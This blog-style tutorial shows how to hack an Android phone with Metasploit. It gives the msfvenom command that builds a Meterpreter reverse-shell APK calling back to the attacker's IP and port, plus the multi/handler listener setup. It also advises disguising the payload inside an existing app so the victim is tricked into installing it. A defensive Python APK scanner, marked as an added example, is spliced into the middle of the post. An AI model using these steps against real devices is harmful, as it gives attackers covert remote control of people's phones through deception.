H4ck Android using METASPLOIT
HACK THE WORLD, LEGALLY OF COURSE
I assume you have a decent Linux distro for hacking, or at least Metasploit.
- Attacker and victim must be on the same network
- Victim should download the APK file
If everything is ready, let's rock n roll
We will generate a PAYLOAD APK that will make a METERPRETER REVERSE SHELL to the attacker's computer.
We are using a basic Msfvenom payload.
You could poison an existing mobile app to trick the victim.
- generate an APK payload
- start a listener
- victim downloads and executes it
- boom, we are done
Generating the payload is a pretty easy task using Msfvenom.
Make sure you have msfvenom by typing
msfvenom -h
in your terminal. If it is ready, you are good to go.
LHOST = Your IP address [ type ifconfig in your terminal ]
LPORT = Any port [ e.g. 4444, 5555, 6666 etc. ]
msfvenom -p android/meterpreter/reverse_tcp LHOST=<YOUR_IP> LPORT=<ANY_PORT> R > payload.apk
In the above command we are using android/meterpreter/reverse_tcp as our payload, because Meterpreter provides us lots of commands, which makes hacking so easy.
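From the defender's side, the payload.apk produced above can be checked for before it is installed. This is an added example, not code from the original post or from Metasploit; it assumes the stager still carries Metasploit's default Java package name (com.metasploit.stage), and scan_apk and build_sample are hypothetical helper names.

```python
import io
import zipfile

# Assumption: an unmodified msfvenom Android stager keeps Metasploit's default
# Java package name. A repackaged or renamed APK will not match this check.
DEFAULT_PACKAGE = "com.metasploit.stage"
MAX_ENTRY_BYTES = 64 * 1024 * 1024  # refuse to inflate huge entries (zip-bomb guard)


def scan_apk(data, package=DEFAULT_PACKAGE):
    """Return (entry, reason) hits for an APK supplied as bytes."""
    dex_marker = ("L" + package.replace(".", "/") + "/").encode("utf-8")
    # Binary AndroidManifest.xml string pools are UTF-16LE or UTF-8.
    manifest_markers = (package.encode("utf-16-le"), package.encode("utf-8"))
    hits = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:  # BadZipFile if not a ZIP
        for info in zf.infolist():
            name = info.filename
            is_manifest = name == "AndroidManifest.xml"
            is_dex = name.startswith("classes") and name.endswith(".dex")
            if not (is_manifest or is_dex):
                continue
            if info.file_size > MAX_ENTRY_BYTES:
                hits.append((name, "too large to inspect"))
                continue
            blob = zf.read(info)
            if is_manifest and any(m in blob for m in manifest_markers):
                hits.append((name, "default stager package name"))
            if is_dex and dex_marker in blob:
                hits.append((name, "default stager class descriptor"))
    return hits


def build_sample(package):
    """Constructed test input: a tiny ZIP shaped like an APK, not a real app."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("AndroidManifest.xml", package.encode("utf-16-le"))
        descriptor = "L" + package.replace(".", "/") + "/Payload;"
        zf.writestr("classes.dex", b"dex\n035\x00" + descriptor.encode("utf-8"))
    return buf.getvalue()


if __name__ == "__main__":
    for pkg in (DEFAULT_PACKAGE, "org.example.notes"):
        print(pkg, scan_apk(build_sample(pkg)))
```

An empty result only means the default markers are absent; it does not show that an APK is safe.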
The listener should be running when the victim installs the app.
Fire up METASPLOIT and use exploit/multi/handler
msf6 > use exploit/multi/handler
Fill in the options; you can see all options by typing show options.
We need to set LHOST, LPORT and PAYLOAD.
set PAYLOAD android/meterpreter/reverse_tcp
set LHOST <IP_USED_ON_PAYLOAD>
set LPORT <PORT_USED_ON_PAYLOAD>
Run the exploit:
run
Now the listener will start; wait until the victim installs the app.
If the victim installs the app, you should get a Meterpreter shell back. CONGRATULATIONS, YOU HACKED IN TO AN ANDROID DEVICE
If you found this post boring, here is the video explanation
"DO NOT USE THIS FOR ILLEGAL STUFF"